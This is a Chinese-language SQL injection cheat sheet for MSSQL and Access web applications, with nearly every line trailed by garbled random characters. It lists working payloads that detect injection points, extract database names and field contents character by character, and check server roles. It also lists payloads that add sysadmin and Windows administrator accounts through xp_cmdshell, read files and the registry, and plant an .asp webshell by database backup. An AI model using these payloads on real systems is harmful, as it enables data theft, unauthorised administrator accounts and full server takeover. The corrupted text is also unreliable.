1.判断是否有注入;and 1=1 ;and 1=2 EVl�j#~mV�
2.初步判断是否是mssql ;and user>0 v�f5q�8/a
�O�KP��NsN
3.注入参数是字符'and [查询条件] and ''=' 4�mHk,Dd9,
$�\+�x7"pI
4.搜索时没过滤参数的'and [查询条件] and '%25'=' \483S]_-z{
�N�:q\i57x
5.判断数据库系统 Nk�V�81�?�
NDUH10Y:[
;and (select count(*) from sysobjects)>0 mssql 9.%��t9RM^
i��E?yvtr8
;and (select count(*) from msysobjects)>0 access b>2���{F6F
ZkJL�q[:cM
�Vq��UCcT�
� PI.Z�d1r
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �QWc,J�Cu
xa'�^:H $X
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 *Z$�W"�JP
yJ/Y���K��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 |}?���H$d�
�� +
\]-"�
9.(1)猜字段的ascii值(access) sW-0�G$,|
<Umr2Vw�-�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 K�491��QXG
��XV}}�A�^
(2)猜字段的ascii值(mssql) ;f~fGsH}e'
%VG�W]!QR
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Ld
0*)rI�#
�Lf)�J�O|o
10.测试权限结构(mssql) d#OAM�;0}5
d_,Ql7�08f
+%f6{&q$�
b�"aF-,M�>
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- f�^-o�t@w
;F�|#m,2Q-
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- r��iL�|B�3
KL�6B�!B{;
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 2!6E~<�~HC
�d>?�C?F��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �9Fy�'�L#%
HS��Wki';G
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- {+m8�^�-�T
,C�I��-IR2
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- a�>6D3n
W�
�Q6H�gh��G
;and 1=(select IS_MEMBER('db_owner'));-- A%2B�3@1'q
HC}�vO0X4�
\HIBnkj)3n
!?>QN�'p.b
11.添加mssql和系统的帐户 }��N}�J�s*
2-DG6\QX|�
;exec master.dbo.sp_addlogin username;-- U)xebU�.!S
;exec master.dbo.sp_password null,username,password;-- }h�sNsQ���
DZ @B9<Zz{
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- d�k^jv +�
�]
s�^�7c�
;exec master.dbo.xp_cmdshell 'net user username password v6|j.�;���
)Q6�2��I\�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �BT&�R:_�:
gxhdx�Sm=2
;exec master.dbo.xp_cmdshell 'net user username password /add';-- +�HPcv�u?1
R��`Fgne$4
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- P���h%{�h"
SXP(��C^?C
sE�'��c$H
b*(K;�`9)B
12.(1)遍历目录 �&XV9_{Hm�
=�I�W!Z�N_
;create table dirs(paths varchar(100), id int) �^r�-d.��1
�Qu1&�$oO�
;insert dirs exec master.dbo.xp_dirtree 'c:\' v)T#
i�w�[
B~E">}=�!�
;and (select top 1 paths from dirs)>0 B~�^*@5#0|
�Vz�$xV�!
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 8�h0C�G]
`Th~r&GvF�
��(6B���;�
&�TY74�w*�
(2)遍历目录 7�8{9@\e"0
4BU�G\~eI3
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ?Wz2J3A.2t
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �2GO��RGS%
(c)�=�Do=�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��]\�KVA)\
���_7\�`xU
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Wlxmp['Bh�
$m�)�gfI]9
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 QRv��ya��V
6`7tTn�?�n
#2s}s<Sc�;
ZM})l9_�o"
13.mssql中的存储过程 \c<;!vkZ04
U+*l!"O�,
xp_regenumvalues 注册表根键, 子键 �-yB}�(�69
xh��bN=�L�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 '5��Yzo^R;
jhf#
gdz%�
xp_regread 根键,子键,键值名 HA��8A}d�~
faDS!E�' +
;exec xp_regread NuPl�rCy;�
n<�bU'�n��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Aw�XzI;F^�
L'�r&'��y[
xp_regwrite 根键,子键, 值名, 值类型, 值 z?<B���@\~
lHtywZ@%3�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 rbnAC*y8'L
�QK?V^��E�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 s2"`j-i��Q
b6
%�m*~��
xp_regdeletevalue 根键,子键,值名 �
�N�d�RcA
LT<2 �n.S
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��e�2v`
�
{daX?�N|�V
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��#�%Bt!#�
?[d4HKs�
>({qg��zV`
eJTU'aX* �
14.mssql的backup创建webshell A[uE#�T��^
:Bmn<2[Y;�
use model �`v!.
,�Yr
8� 7(t<3V&
create table cmd(str image); ��{�7ji��m
A�!Cby�!,�
insert into cmd(str) values (''); �3s/��1\m%
L4Z�t4Yuw�
backup database model to disk='c:\l.asp'; ~w3u(X�$m"
����mP�&\?
CdF;0A9�.3
�=�4M�Tb�_
15.mssql内置函数 ]CF��-#q}'
p�pRmC,0f^
;and (select @@version)>0 获得Windows的版本号 g5@JA^\vZT
4WvW11q8U�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa @>Y�d��6C�
R��1X'}#mU
;and (select user_name())>0 爆当前系统的连接用户 .��*x����:
w[
v��{�)
;and (select db_name())>0 得到当前连接的数据库 9^�W7i]-Z�
S[e��xnZ*Y
�
-Dd�Hl�8
��~�jL%l��
16.简洁的webshell 0WC\u�xT�7
S~);���
�
use model (�O{OQk;CF
f�r/EkL1Dl
create table cmd(str image); )�:'wxIVGI
8�6OrJdD�8
insert into cmd(str) values (''); U;#KFZ��+~
�&G��jpc>d
backup database model to disk='g:\wwwtest\l.asp';
